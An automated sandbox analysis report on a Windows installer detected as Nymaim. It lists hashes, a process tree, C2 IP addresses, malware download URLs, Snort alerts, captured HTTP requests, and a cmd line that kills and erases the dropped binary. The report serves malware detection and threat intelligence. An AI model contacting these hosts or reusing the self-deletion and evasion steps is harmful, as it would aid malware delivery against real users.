Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:778239
MD5:4206f8b371294f11b01592acc7bb338d
SHA1:9383a82b185715c4b42b23ef730acb53f17dfcfb
SHA256:5f5252d8963550284ca23188a6ee8a5b9aa85c3d1ce1f5983ee7dcc7e60f8b33
Tags:exe
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 1968 cmdline: C:\Users\user\Desktop\file.exe MD5: 4206F8B371294F11B01592ACC7BB338D)
    • is-EPSRP.tmp (PID: 3132 cmdline: "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496 MD5: E8176050192FBB976D70238E3C121F4C)
      • SplitFiles131.exe (PID: 4948 cmdline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe" MD5: D26C02425FA67FBDC0E4B4D5D6FA6088)
        • rf6CwnLa.exe (PID: 588 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 2264 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 6076 cmdline: taskkill /im "SplitFiles131.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup
{"C2 addresses": ["45.139.105.1", "85.31.46.167"]}
Source | Rule | Description | Author | Strings
00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

Source | Rule | Description | Author | Strings
2.2.SplitFiles131.exe.400000.1.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.SplitFiles131.exe.3210000.3.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.SplitFiles131.exe.400000.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.SplitFiles131.exe.3210000.3.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
                No Sigma rule has matched
                Source IP:192.168.2.4
                Destination IP:45.139.105.171
                Timestamp:01/05/23-09:17:07.792702
                SID:2041920
                Source Port:49696
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:192.168.2.4
                Destination IP:107.182.129.235
                Timestamp:01/05/23-09:17:07.993654
                SID:2852981
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:107.182.129.235
                Destination IP:192.168.2.4
                Timestamp:01/05/23-09:17:08.021859
                SID:2852925
                Source Port:80
                Destination Port:49697
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:192.168.2.4
                Destination IP:107.182.129.235
                Timestamp:01/05/23-09:17:07.923264
                SID:2852980
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected


                AV Detection

                Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                Source: http://107.182.129.235/storage/extension.php8Avira URL Cloud: Label: malware
                Source: http://107.182.129.235/storage/extension.php8Virustotal: Detection: 13%Perma Link
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exeReversingLabs: Detection: 50%
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeJoe Sandbox ML: detected
                Source: 2.2.SplitFiles131.exe.10000000.5.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 0.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 0.2.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 2.2.SplitFiles131.exe.400000.1.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167"]}
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_10001000 ISCryptGetVersion,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_10001130 ArcFourCrypt,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

                Compliance

                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045157C FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp

                Networking

                Source: TrafficSnort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.4:49696 -> 45.139.105.171:80
                Source: TrafficSnort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.4:49697
                Source: Malware configuration extractorIPs: 45.139.105.1
                Source: Malware configuration extractorIPs: 85.31.46.167
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewIP Address: 45.139.105.171 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php8
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.php
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235ibrary.php
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-MR54O.tmp.1.dr, is-IRLOP.tmp.1.drString found in binary or memory: http://rus.altarsoft.com/split_files.shtml
                Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-2KTR4.tmp.1.dr, is-KJUD7.tmp.1.dr, is-8T8VP.tmp.1.dr, is-L90L4.tmp.1.dr, is-JPC2L.tmp.1.dr, is-4QNQO.tmp.1.dr, is-DPLT0.tmp.1.dr, is-2C8S0.tmp.1.dr, is-BOL01.tmp.1.dr, is-T2GFQ.tmp.1.drString found in binary or memory: http://www.altarsoft.com/split_files.shtml
                Source: file.exeString found in binary or memory: http://www.innosetup.com
                Source: is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377767344.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.remobjects.com/?psU
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: global trafficHTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: rf6CwnLa.exe, 00000003.00000002.312986657.0000000001750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408280
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00468C28
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00461280
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0043DE40
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004302D0
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004445B8
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00434864
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0047AA90
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00444B60
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045ADE0
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00480F94
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00445258
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004132E1
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00463288
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00435568
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00445664
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0042F874
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00457F04
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004056A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00406800
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00406AA0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404D40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00405F40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004150D3
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00415305
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_004223A9
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00419510
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404840
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00426850
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00410A50
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0042AB9A
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00421C88
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0042ACBA
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00447D2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00428D39
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404F20
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_1000F670
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_1000EC61
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: String function: 0040F9E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00408CA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00403548 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00446194 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00445EC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 0043477C appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00455D54 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00407988 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00455B64 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00451DE8 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: String function: 00405A9C appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00423C4C NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004126A0 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
Source: is-EPSRP.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-EPSRP.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-EPSRP.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-5V8K4.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-5V8K4.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-5V8K4.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.exe, 00000000.00000000.295778835.0000000000417000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe | Binary or memory string: OriginalFilename" vs file.exe
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Split Files\is-5V8K4.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
Source: SplitFiles131.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70,
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SplitFiles131.exe")
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/39@0/5
